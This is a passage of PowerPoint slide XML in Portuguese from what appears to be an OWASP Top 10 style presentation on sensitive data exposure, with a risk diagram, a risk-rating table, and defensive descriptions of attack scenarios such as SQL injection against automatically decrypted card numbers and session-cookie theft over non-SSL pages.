              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>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49" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>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65" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1633"/>
                  <a:ext cx="288" cy="0"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1309572" y="1078361"/>
                <a:ext cx="838244" cy="357076"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 20889"/>
                  <a:gd name="adj2" fmla="val 24667"/>
                  <a:gd name="adj3" fmla="val 34667"/>
                  <a:gd name="adj4" fmla="val 8013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Vetores </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> de Ataque</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800666" y="1049795"/>
                <a:ext cx="685836" cy="428491"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 250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Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Técnicos</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="761855" y="1262453"/>
                <a:ext cx="535016" cy="1588"/>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41" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2189093" y="1262453"/>
                <a:ext cx="630270" cy="1588"/>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42" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="36" idx="3"/>
                <a:endCxn id="39" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3900507" y="1264041"/>
                <a:ext cx="900159"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sp>
            <p:nvSpPr>
              <p:cNvPr id="43" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="14975" y="1322855"/>
                <a:ext cx="1132100" cy="199673"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Agentes </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>de </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Ameaça</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923088" y="1073600"/>
                <a:ext cx="762040" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>no Negócio</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="45" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="39" idx="4"/>
                <a:endCxn id="44" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486502" y="1264041"/>
                <a:ext cx="436586"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
          <p:nvSpPr>
            <p:cNvPr id="34" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879691" y="1090772"/>
              <a:ext cx="220675" cy="380881"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 47538"/>
                <a:gd name="adj2" fmla="val 51293"/>
                <a:gd name="adj3" fmla="val 57006"/>
                <a:gd name="adj4" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>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endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2862228" y="1235189"/>
              <a:ext cx="109543" cy="9522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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6969566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5" name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2928006725"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="914400"/>
          <a:ext cx="6858000" cy="2748280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1295400"/>
                <a:gridCol w="990600"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="609600">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gridSpan="2">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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>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r>
              <a:tr h="3748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000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico da Aplicação</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pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploração</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DIFÍCIL</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0"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pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prevalência</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RARA</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pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detecção</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIA</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0"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pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impacto</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>SEVERO</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0"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pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> do Negócio / Aplicação</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0"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61160">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere quem pode ter acesso aos seus dados sensíveis e backups desses dados. Incluindo os dados em repouso, em tráfego, e até mesmo nos navegadores de seus clientes. Inclua tanto ameaças externas como internas.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="900" noProof="0" dirty="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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Os atacantes normalmente não quebram diretamente a criptografia. Eles exploram de outra forma, como roubar chaves, aplicar ataques do tipo </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" i="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>man-in-the-middle</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, ou roubar dados em texto claro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fora do servidor, enquanto transitam, ou a partir do navegador do usuário.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="900" noProof="0" dirty="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>A falha mais comum é simplesmente não criptografar dados sensíveis. Quando a criptografia é utilizada, a geração e gerenciamento de chaves é fraca, além d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> utilização de algoritmos e técnicas de hashing fracos. Vulnerabilidades no navegador são comuns e fácil de detectar, mas são difíceis de explorar em larga escala. Atacantes externos tem dificuldade em detectar falhas no lado do servidor, devido ao acesso limitado e também são geralmente mais difíceis de explorar.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="900" b="0" noProof="0" dirty="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a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>A falha frequentemente compromete todos os dados que deveriam ter sido protegidos. Normalmente, essas informações incluem dados sensíveis tais como registros</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> médicos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, credenciais de acesso, dados pessoais, cartões de crédito, etc.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="900" noProof="0" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere o valor de negócio dos dados perdidos e o impacto para sua reputação. Qual é a sua responsabilidade legal se estes dados forem expostos? Considere também os danos à sua reputação.</a:t>
                      </a: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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6366680"/>
            <a:ext cx="3383280" cy="277732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r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemplos de Cenários de Ataque</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário #1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Uma aplicação </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>criptografa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>números de cartão de crédito em um banco de dados usando a criptografia automática </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do banco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dados. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>en-tanto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, isso significa que também </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>descriptografa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esses dados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automaticamen-te </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quando recuperados, permitindo uma falha de injeção SQL para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>recuperar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>os números de cartão de crédito em texto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>claro. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O sistema deveria ter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cripto-grafado </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>os números de cartão de crédito através de uma chave pública, e só permitir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a descriptografia por aplicações </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>back-end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a chave privada.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário #2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Um site simplesmente não usa SSL em todas as páginas autenticadas. O atacante simplesmente monitora o tráfego de rede (como uma rede wireless aberta), e rouba o cookie de sessão do usuário. O atacante então reproduz este cookie e sequestra a sessão do usuário, acessando dados privados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do mesmo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
